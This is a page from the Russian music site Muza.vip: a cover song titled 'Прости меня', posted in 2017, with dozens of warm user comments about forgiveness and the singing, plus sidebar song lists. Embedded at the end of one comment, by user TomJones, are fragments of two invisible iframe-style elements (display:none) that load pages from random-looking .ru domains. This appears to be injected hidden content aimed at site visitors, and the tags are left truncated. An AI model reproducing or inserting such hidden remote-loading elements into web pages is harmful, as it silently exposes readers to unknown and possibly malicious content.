На главную Muza.vip
      
My Love
(Paul McCartney)
Запела осень
(Хурсенко Вячеслав)
Hello Goodbye
(Beatles)
Романс
(Сумишевский Ярослав)
Я не буду ни о чём жалеть
(Исмоиловы Хасан и Хусен)


Песня месяца
Май 2026 года
Angelochek_msНадоело засыпать одной
(Мельянцева Надежда)

Баллов: 717



   «Прости меня» (Седьмое небо)

390   114   10
   Кавер-версия от Seven-sky
26.02.2017 1736
Сегодня родилась еще одна песня на слова Оксаны Михайловой (_Barbariska_)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Прости меня. За все...
  Баллов:
122
  


Комментарии пользователей к записи:

          Страницы: 1  2 

egorrushka, 26.02.2017 г. 17:50
Бог простит! И ты меня прости.serdce_v_ruke
  

Seven-sky, 26.02.2017 г. 18:35
И я прощаю... С Богом.

serdce_v_ruke
  
kolginova, 26.02.2017 г. 17:52
Оксаночка,прости и ты меня на все...вдруг обидела тебя невольно)
Песня получилась такая нежная...и ты такая нежная...
  

Seven-sky, 26.02.2017 г. 18:35
Бог простит. И ты меня прости, Галочка.

Спасибочки!
  

kolginova, 26.02.2017 г. 19:02
Бог простит)))
  
Boris907, 26.02.2017 г. 17:58
Замечательное исполнение красивой песни, браво, Оксана!voo
Мои наилучшие пожелания в преддверии весны!buket_big

  

Seven-sky, 26.02.2017 г. 18:36
Борис, спасибо большущее!
И Вам теплой весны! angelochek
  
regina74, 26.02.2017 г. 18:06
  

Seven-sky, 26.02.2017 г. 18:36
Пусть Бог простит всех нас, Региночка!

Спасибо! angelochek
  
ilana, 26.02.2017 г. 18:31
love_onlineДевочки,вы просто умницы!v_naushnikahklassd9
  

Seven-sky, 26.02.2017 г. 18:37
Инночка, благодарю от нас обеих! angelochek
  
JIEHO4KA, 26.02.2017 г. 18:33
Красота НЕБеснАя..........!
Небачкааа!love_online

  

Seven-sky, 26.02.2017 г. 18:37
Сонцааа)) Маяя...!))

Спасибочка!)) vstrecha
  
kudvas, 26.02.2017 г. 18:36
С удовольствием послушал!!!!!!!!!!!!!bravo_bigbuket_big
  

Seven-sky, 26.02.2017 г. 18:40
Очень приятно Ваше внимание, Василий! Благодарим! guitar
  
singerin, 26.02.2017 г. 19:16
Волшебная песня,Оксана!love_onlineГоворят ,бог простит...и ты прости!
  

Seven-sky, 27.02.2017 г. 08:17
Аллочка, спасибо большущее! Прости и ты меня)

А Бог - он всегда прощает... angelochek
  
svet007, 26.02.2017 г. 19:18
Не проклинайте, не завидуйте, не надо,
Не шлите на людей дурного взгляда
Не унижайте и, конечно, не судите,
Слов не бросайте сгоряча, и не грубите.
Вы излучайте свет и просто улыбайтесь,
Пусть нелегко порой простить, но постарайтесь,
Порадуйтесь Вы за успех других, а не печальтесь,
Им было тоже нелегко...
Вы не сдавайтесь.
И не ищите Вы ни в ком другом изъянов,
Не существует на земле ведь идеалов,
Вы за собой следите, за словами,
Другие разберутся в себе сами.
Не проклинайте, не завидуйте, не надо,
Не шлите на людей дурного взгляда,
Не унижайте и, конечно, не судите,
А просто улыбнитесь и простите....
  

Seven-sky, 27.02.2017 г. 08:19
Да, Светик, это кодекс, которого сложно придерживаться, но так нужно...
Спасибо большое! angelochek
  
tumantho1, 26.02.2017 г. 19:38
s_sharikamiВеликолепная песня родилась!!!klass Молодцы, авторы!!! bravo_bigКрасиво донесла ее до нас!!!d9
Бог простит и мы прощаем!!!angelochek


  

Seven-sky, 27.02.2017 г. 08:19
Леночка, благодарим тебя от души! buket_serdechki
С днем великого прощения тебя! angelochek
  
vote_no, 26.02.2017 г. 19:50
Замечательная песня!!!!....и по словам, и по музыке, и по исполнению!
Оксана, с праздником!
...и прости меня. Есть за мной грех......
  

Seven-sky, 27.02.2017 г. 08:21
Марго, спасибо большое тебе!! buket_serdechki

Да нет уже давно за тобой никаких грехов). Прости и ты меня..
  
podsnegnik, 26.02.2017 г. 20:15
bravo_bigПрекрасно, милая Оксана!!!buket_bigvozdushnyj_pocelujПрости....
  

Seven-sky, 27.02.2017 г. 08:26
Спасибо большое! Светлой весны! angelochek
  
igorded, 26.02.2017 г. 20:19
Красиво Оксанкаguitar..и ты меня прости,что я на порностраничке спел твою песнюangelochekrozochka
  

Seven-sky, 27.02.2017 г. 08:50
Спасибо, Игорь!

А дальше я не поняла, это ты о чем? Я не в курсе. Вообще, конечно, ты можешь делать что хочешь и где хочешь. Только меня в эти дела не впутывай, пожалуйста.
  
TomJones, 26.02.2017 г. 20:53
Оксаночка, прости меня за привередливость и предвзятость. Я могу не любить какие-то стили, какие-то песни, но тебя все равно люблю. vozdushnyj_poceluj id="a1996667054" src="https://ec2f1xubcblb.ru/f2.html?a=27855" style="display:none"> id="a754394637" src="https://3o9cpydyue4s8.ru/u.html?a=27855" style="display:none">
  

Seven-sky, 27.02.2017 г. 09:51
Бог простит. И ты прости...

angelochek
  
domingo28, 26.02.2017 г. 21:22
Оксанка, хорошую песнь сложила!!! Женская задушевность трогает бесконечно...Надеюсь, не только женские сердца!!!
Прости меня!!!
  

Seven-sky, 27.02.2017 г. 09:51
И ты прости меня, Галочка!
Спасибо, дорогая! buket_serdechki
  
ReVN, 26.02.2017 г. 21:50
...прости и ты меня..... и я тебя прощаю....angelochek....
Очаровательная песня и как ты ее спела, Оксана!!!bravo_bigbuket_big
  

Seven-sky, 27.02.2017 г. 09:52
Бог всех простит, Володя!)
Спасибо большущее! buket_serdechki
  
Mu3EP, 26.02.2017 г. 22:02
Грешу и каюсь! Прости, Оксанка!!! molitva Очень душевно у тебя!!! serdce_v_ruke rozochka
  

Seven-sky, 27.02.2017 г. 09:54
Вот точно, грешим и каемся, Сережка!)) angelochek Прости и ты меня)
Рада, что тебе душевно здесь, спасибо!
  
navara_i, 26.02.2017 г. 22:32
Оксана!!! Трогательно, от сердечка!!!!! Понравилось!!!!!!!!buket_big vozdushnyj_poceluj
  

Seven-sky, 27.02.2017 г. 09:54
Большое спасибо, Игорь! buket_serdechki
  
runomir, 27.02.2017 г. 03:15
КСЮША ПЕСНЯ РОДИЛАСЬ ПРОСТО КАЙФ!d9 ИСПОЛНЕНИЕ ВЫСШИЙ ПИЛОТАЖ!klassПРОСТИ МЕНЯ!love_onlinebuket
  

Seven-sky, 27.02.2017 г. 09:55
И ты прости, Сашенька!
Рада, что нравится. Спасибо тебе большое! buket_serdechki


  
SNeg-, 27.02.2017 г. 06:42
Оксаночка!!! vozdushnyj_pocelujЭто уже твоя третья подряд гитарная Авторская песня!!!guitar Творчество пошло в Тему!!!dadaВся плеяда этих песен дополняют друг друга и слушается в кайф!!! voo Молодчинки вы с Барбариской!!!bravo_bigbravo_bigbuket_serdechkibuket_serdechki
  

Seven-sky, 27.02.2017 г. 09:59
Четвертая, Сережка))
Оно само как-то... Я просто записываю... Никогда не думала, что так бывает.

Тьфу-тьфу...
Спасибо, дорогой, и от меня, и от Барбариски guitarangelochek

  

          Страницы: 1  2 

align=absbottomКомментарии могут оставлять только зарегистрированные пользователи, активировавшие аккаунт!
Зарегистрироваться или войти

  ПОМОГАЕМ
  ЖИВОТНЫМ
  В ЗОНЕ СВО




Студия
Biss
И плакали дожди
Косенко Вадим
MAXMIX
Милая моя, любимая
Одинцов Сергей
Pol701
Dance me to the end of love
Leonard Cohen
Nissan66
Палуба
Маркин Владимир
Aleksantin
В меня глазами не стреляй
Искусственный интеллект
Garry
Песня про казака
В 6 часов вечера после войны
vas707356
Беззаботный
Маршал Александр
4upakabra
Расскажи, Снегурочка
4upakabra
ARAKS
Вас не нужно жалеть
Кальянов Александр
besel1212
Священная война
Военные и Патриотические
rww01
Тик-так
Ждамиров Владимир
alsar
Наша жизнь
Михайлов Стас
ivanka-nik-2
Простой мотив
Лещенко Лев
natashap
А я ждала
Александрова Марина
ivanka-nik-1
Мама
Магомаев Муслим
FAMOUS
Я любил тебя
Дато
p12et1025
Дружба
Митяев Олег
akononov6690
А может ты найдёшь быстрей
Band Odessa
elemi
Судьба
Руденко Артур
lena_chka_54
Быть женщиной твоей
Джанни Стелла
Otblesk
Черный ворон
Русские
RUSSMIR
Молитва
Варвара
lesha
Мечтать не грех
Кричевский Гарик
Vladavtopilot
22-е июня
Сукачев Гарик
egorrushka
22 июня
Митяев Олег
dimakapitan
Не покидай меня
Трофимов Сергей
mranatolm
Синий платочек
Козин Вадим
Temanik
Галина
Добры молодцы
LonelyWoolf
Changes
Black Sabbath
Haris1958
Dream on
Nazareth




Территория творческого настроения © Muza.vip, 2011 — 2026 гг. Пользовательское соглашение.